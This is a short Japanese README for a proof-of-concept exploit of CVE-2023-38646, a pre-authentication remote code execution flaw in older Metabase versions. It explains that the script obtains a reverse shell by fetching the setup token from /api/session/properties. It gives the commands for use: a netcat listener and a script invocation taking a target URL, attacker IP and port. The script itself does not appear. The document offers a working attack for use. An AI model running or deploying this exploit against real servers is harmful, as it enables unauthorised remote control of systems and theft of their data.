
Metabase 事前認証 RCE PoC
Metabase オープンソース 0.46.6.1 より前、および Metabase Enterprise 1.46.6.1 より前のバージョンでは、攻撃者がサーバー上で任意のコマンドを実行できます。このスクリプトは、攻撃者のマシン上でリバースシェルを取得するために直接作成しました。
このスクリプトには、ターゲット URL、攻撃者の IP、ポートが必要です。このエクスプロイトでは、スクリプトが /api/session/properties から取得を試みるため、セットアップトークンを指定する必要はありません。
攻撃者のマシンで netcat リスナーを起動してください。次のコマンドを使用します:
nc -nlvp {Port}
POC スクリプトを実行するには、以下のオプションを指定します:
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>
